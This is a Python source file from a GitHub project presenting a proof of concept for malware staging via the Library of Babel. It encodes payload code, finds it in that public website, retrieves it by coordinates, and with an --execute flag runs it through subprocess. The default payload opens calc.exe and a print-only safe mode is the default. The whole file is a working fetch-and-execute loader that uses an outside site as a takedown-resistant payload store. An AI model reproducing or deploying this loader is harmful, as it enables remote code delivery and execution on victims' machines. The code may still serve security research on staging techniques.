Babel_Malware_Staging/main.py at master · Sonael/Babel_Malware_Staging · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
#!/usr/bin/env python3
"""
Proof of Concept: Malware Staging via Library of Babel

This script demonstrates how malicious payloads can be stored and retrieved
from the Library of Babel, providing a persistent and censorship-resistant
storage mechanism for malware staging.

WARNING: This is for educational purposes only. Do not use for malicious purposes.
"""

import sys
import argparse
import subprocess
from typing import Optional

import babel
import encoder


def log(message, level="INFO"):
    """Simple logging function."""
    print(f"[{level}] {message}")


def encode_and_search(payload):
    """
    Encode payload and search for it in the Library of Babel.

    Args:
        payload (str): The payload to encode and search

    Returns:
        tuple: (encoded_payload, hex, wall, shelf, volume, page) or (None, ...) on failure
    """
    try:
        log("Encoding payload to Babel format...")
        encoded = encoder.encode_to_babel(payload)
        log(f"Encoded payload: {encoded[:100]}{'...' if len(encoded) > 100 else ''}")

        log("Searching in Library of Babel...")
        hex_id, wall, shelf, volume, page = babel.search(encoded)

        if not hex_id:
            log("Search failed: payload not found", "ERROR")
            return None, None, None, None, None, None

        log(f"Location found: hex={hex_id}, wall={wall}, shelf={shelf}, vol={volume}, page={page}")
        return encoded, hex_id, wall, shelf, volume, page

    except ValueError as e:
        log(f"Encoding error: {e}", "ERROR")
        return None, None, None, None, None, None
    except babel.SearchError as e:
        log(f"Search error: {e}", "ERROR")
        return None, None, None, None, None, None


def retrieve_and_decode(hex_id, wall, shelf, volume, page):
    """
    Retrieve content from Library of Babel and decode it.

    Args:
        hex_id (str): Hexagon identifier
        wall (str): Wall number
        shelf (str): Shelf number
        volume (str): Volume number
        page (str): Page number

    Returns:
        str: Decoded payload or None on failure
    """
    try:
        log("Retrieving from Library of Babel...")
        response = babel.browse(hex_id, wall, shelf, volume, page)

        if not response:
            log("Browse failed: no content retrieved", "ERROR")
            return None

        log(f"Retrieved {len(response)} characters")

        log("Decoding from Babel format...")
        decoded = encoder.decode_from_babel(response)
        log(f"Decoded payload: {decoded}")

        return decoded

    except babel.ValidationError as e:
        log(f"Validation error: {e}", "ERROR")
        return None
    except babel.BrowseError as e:
        log(f"Browse error: {e}", "ERROR")
        return None


def execute_payload(payload, safe_mode=True):
    """
    Execute the payload.

    Args:
        payload (str): The payload to execute
        safe_mode (bool): If True, only print the payload without executing

    Returns:
        str: Output from execution or None
    """
    if safe_mode:
        log("SAFE MODE: Would execute the following payload:", "WARNING")
        log(payload, "WARNING")
        return None

    try:
        log("Executing payload...", "WARNING")
        result = subprocess.run(
            ["python", "-c", payload],
            capture_output=True,
            text=True,
            timeout=10
        )

        if result.stdout:
            log(f"Stdout: {result.stdout}")
        if result.stderr:
            log(f"Stderr: {result.stderr}", "WARNING")

        return result.stdout

    except subprocess.TimeoutExpired:
        log("Execution timed out", "ERROR")
        return None
    except Exception as e:
        log(f"Execution error: {e}", "ERROR")
        return None


def demonstrate_staging(payload, execute=False):
    """
    Demonstrate the complete staging process.

    Args:
        payload (str): The malicious payload
        execute (bool): Whether to actually execute the payload
    """
    log("="*60)
    log("MALWARE STAGING DEMONSTRATION")
    log("="*60)

    # Phase 1: Encode and search
    log("\n--- PHASE 1: Encode and Store ---")
    encoded, hex_id, wall, shelf, volume, page = encode_and_search(payload)

    if not hex_id:
        log("Demonstration failed at encoding/search phase", "ERROR")
        return

    # Phase 2: Retrieve and decode
    log("\n--- PHASE 2: Retrieve and Decode ---")
    decoded = retrieve_and_decode(hex_id, wall, shelf, volume, page)

    if not decoded:
        log("Demonstration failed at retrieval/decode phase", "ERROR")
        return

    # Verify integrity
    if decoded != payload:
        log("WARNING: Decoded payload does not match original!", "ERROR")
        log(f"Original: {payload}", "ERROR")
        log(f"Decoded:  {decoded}", "ERROR")
        return

    log("Integrity check: PASSED")

    # Phase 3: Execute
    log("\n--- PHASE 3: Execute ---")
    execute_payload(decoded, safe_mode=not execute)

    log("\n" + "="*60)
    log("DEMONSTRATION COMPLETE")
    log("="*60)


def main():
    """Main entry point with CLI argument parsing."""
    parser = argparse.ArgumentParser(
        description="Malware Staging PoC using Library of Babel",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
        Examples:
        # Safe demonstration (no execution)
        python main.py --payload "print('Hello, World!')"

        # Actually execute the payload (DANGEROUS)
        python main.py --payload "print('Hello, World!')" --execute

        # Use default demonstration payload
        python main.py
        """
    )

    parser.add_argument(
        "--payload",
        type=str,
        help="Python code to use as payload (default: calc.exe example)"
    )

    parser.add_argument(
        "--execute",
        action="store_true",
        help="Actually execute the payload (WARNING: dangerous!)"
    )

    parser.add_argument(
        "--coordinates",
        type=str,
        help="Retrieve from specific coordinates (format: hex,wall,shelf,volume,page)"
    )

    args = parser.parse_args()

    # Handle coordinate-based retrieval
    if args.coordinates:
        try:
            coords = args.coordinates.split(",")
            if len(coords) != 5:
                log("Coordinates must be in format: hex,wall,shelf,volume,page", "ERROR")
                sys.exit(1)

            hex_id, wall, shelf, volume, page = coords
            decoded = retrieve_and_decode(hex_id, wall, shelf, volume, page)

            if decoded:
                execute_payload(decoded, safe_mode=not args.execute)
        except Exception as e:
            log(f"Error: {e}", "ERROR")
            sys.exit(1)
        return

    # Default payload
    if args.payload is None:
        payload = "import subprocess; subprocess.Popen('calc.exe')"
        log("Using default payload (calc.exe)", "INFO")
    else:
        payload = args.payload

    # Run demonstration
    demonstrate_staging(payload, execute=args.execute)


if __name__ == "__main__":
    main()